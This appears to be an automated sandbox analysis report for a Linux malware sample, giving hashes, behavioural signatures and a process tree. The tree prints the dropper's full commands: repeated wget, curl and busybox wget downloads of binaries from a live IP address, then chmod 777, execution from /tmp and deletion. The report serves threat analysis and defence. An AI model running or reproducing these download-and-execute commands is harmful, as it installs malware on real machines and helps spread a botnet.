Analysis
- max time kernel: 13s
- max time network: 15s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 09-11-2024 15:13
Tasks
- Static task static1
- Behavioral task behavioral1: sample 838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N, resource ubuntu1804-amd64-20240729-en
- Behavioral task behavioral2: sample 838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N, resource debian9-armhf-20240611-en
- Behavioral task behavioral3: sample 838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N, resource debian9-mipsbe-20240611-en
- Behavioral task behavioral4: sample 838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N, resource debian9-mipsel-20240729-en
General
- Target: 838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
- Size: 10KB
- MD5: 8024f690eb7cff058a13d1d38f0b31c0
- SHA1: c4be3a2eb04473145808dd1ce797dce7815d06dc
- SHA256: 838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856
- SHA512: 9fa6258d021edb3a5423acb3c3d58dddad944e245b9f849a1f4ce16473b3976c29b7e07c4f171df4f4d8acd04988b6eba64c58a82ecf121b6c9756d10324ec9f
- SSDEEP: 192:+fEqq1c7X/8cm6S6m6W6D676ABfBga7X/8cI6S6m6W6D676wqqi:+fEqq1c7X/8c0BfBga7X/8cuqqi
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTP, 8 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes (pid, process): 698 chmod; 725 chmod; 744 chmod; 774 chmod; 786 chmod; 798 chmod; 792 chmod; 681 chmod
- Executes dropped EXE (8 IoCs)
  Processes (ioc, pid, process):
  - /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ, 682, 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ
  - /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK, 700, pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK
  - /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX, 726, eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX
  - /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo, 745, LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo
  - /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f, 775, FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f
  - /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg, 787, F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg
  - /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5, 793, BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5
  - /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay, 799, SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay
- Checks CPU configuration (1 TTP, 8 IoCs)
  Checks CPU information that indicates whether the system is a virtual machine.
  Processes (description, ioc, process): File opened for reading, /proc/cpuinfo, curl (8 identical entries, one per curl process)
- Reads runtime system information
  Processes (description, ioc, process):
  - File opened for reading, /proc/self/auxv, curl (8 entries)
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl (8 entries)
- Writes file to tmp directory (8 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description, ioc, process):
  - File opened for modification, /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK, curl
  - File opened for modification, /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX, curl
  - File opened for modification, /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo, curl
  - File opened for modification, /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f, curl
  - File opened for modification, /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg, curl
  - File opened for modification, /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5, curl
  - File opened for modification, /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay, curl
  - File opened for modification, /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ, curl
Processes
Each entry gives the PID, the command line, the image path in brackets and, on the following line, any signatures the process triggered; indentation shows parent/child depth.
- PID 648: /tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N  [/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N]
  - PID 650: /bin/rm bins.sh  [/bin/rm]
  - PID 655: wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ  [/usr/bin/wget]
  - PID 670: curl -O http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ  [/usr/bin/curl]
    signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 677: /bin/busybox wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ  [/bin/busybox]
  - PID 681: chmod 777 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ  [/bin/chmod]
    signatures: File and Directory Permissions Modification
  - PID 682: ./8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ  [/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ]
    signatures: Executes dropped EXE
  - PID 683: rm 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ  [/bin/rm]
  - PID 684: wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK  [/usr/bin/wget]
  - PID 685: curl -O http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK  [/usr/bin/curl]
    signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 691: /bin/busybox wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK  [/bin/busybox]
  - PID 698: chmod 777 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK  [/bin/chmod]
    signatures: File and Directory Permissions Modification
  - PID 700: ./pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK  [/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK]
    signatures: Executes dropped EXE
  - PID 701: rm pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK  [/bin/rm]
  - PID 703: wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX  [/usr/bin/wget]
  - PID 710: curl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX  [/usr/bin/curl]
    signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 718: /bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX  [/bin/busybox]
  - PID 725: chmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX  [/bin/chmod]
    signatures: File and Directory Permissions Modification
  - PID 726: ./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX  [/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX]
    signatures: Executes dropped EXE
  - PID 727: rm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX  [/bin/rm]
  - PID 729: wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo  [/usr/bin/wget]
  - PID 739: curl -O http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo  [/usr/bin/curl]
    signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 743: /bin/busybox wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo  [/bin/busybox]
  - PID 744: chmod 777 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo  [/bin/chmod]
    signatures: File and Directory Permissions Modification
  - PID 745: ./LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo  [/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo]
    signatures: Executes dropped EXE
  - PID 746: rm LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo  [/bin/rm]
  - PID 747: wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f  [/usr/bin/wget]
  - PID 751: curl -O http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f  [/usr/bin/curl]
    signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 760: /bin/busybox wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f  [/bin/busybox]
  - PID 774: chmod 777 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f  [/bin/chmod]
    signatures: File and Directory Permissions Modification
  - PID 775: ./FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f  [/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f]
    signatures: Executes dropped EXE
  - PID 777: rm FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f  [/bin/rm]
  - PID 778: wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg  [/usr/bin/wget]
  - PID 784: curl -O http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg  [/usr/bin/curl]
    signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 785: /bin/busybox wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg  [/bin/busybox]
  - PID 786: chmod 777 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg  [/bin/chmod]
    signatures: File and Directory Permissions Modification
  - PID 787: ./F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg  [/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg]
    signatures: Executes dropped EXE
  - PID 788: rm F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg  [/bin/rm]
  - PID 789: wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5  [/usr/bin/wget]
  - PID 790: curl -O http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5  [/usr/bin/curl]
    signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 791: /bin/busybox wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5  [/bin/busybox]
  - PID 792: chmod 777 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5  [/bin/chmod]
    signatures: File and Directory Permissions Modification
  - PID 793: ./BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5  [/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5]
    signatures: Executes dropped EXE
  - PID 794: rm BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5  [/bin/rm]
  - PID 795: wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay  [/usr/bin/wget]
  - PID 796: curl -O http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay  [/usr/bin/curl]
    signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 797: /bin/busybox wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay  [/bin/busybox]
  - PID 798: chmod 777 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay  [/bin/chmod]
    signatures: File and Directory Permissions Modification
  - PID 799: ./SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay  [/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay]
    signatures: Executes dropped EXE
  - PID 800: rm SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay  [/bin/rm]
  - PID 801: wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC  [/usr/bin/wget]
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97